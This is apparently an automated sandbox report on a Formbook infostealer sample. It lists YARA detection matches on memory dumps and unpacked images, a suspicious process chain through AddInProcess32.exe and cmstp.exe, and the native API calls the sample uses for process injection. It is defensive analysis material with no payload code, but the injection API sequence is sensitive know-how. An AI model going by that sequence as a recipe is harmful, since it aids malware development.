Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: 583475.exe, m1DY/f0L8.cs Large array initialization: .cctor: array initializer size 4946
Source: 583475.exe, Zp0/e6J.cs Large array initialization: .cctor: array initializer size 2762
Source: 583475.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_02AB7288
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_02AB7720
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C1668
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C35D8
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C82F0
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C4F28
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C6780
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067CE520
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067CE510
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C2350
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C60DB
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067CEAD0
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067CEAC0
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C8BA0
Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067C8B99
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041C912
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041BBD8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041BE0F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00892050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01310D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01334120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0131F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E2D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E1D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01342581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0132D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0132841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013D1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E20A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0132B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E2B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E1FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013DDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01336E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E22AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E2EF7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E4B090
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04EF1002
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E4841F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E4D5E0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E62581
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04F01D55
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E30D20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E54120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E3F900
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E56E30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E6EBB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAC912
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02F92FB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02F98C70
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02F92D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 0131B150 appears 35 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 04E3B150 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004185D0 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00418680 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00418700 NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004185CA NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041867A NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004186FA NtReadFile,NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013595D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013598F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013597A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0135AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013595F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013599D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0135B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013598A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0135A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0135A770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0135A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01359A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013596D0 NtCreateKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E795D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E796D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E798F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E798A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E7B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E795F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E799D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E7AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79670 NtQueryInformationProcess,
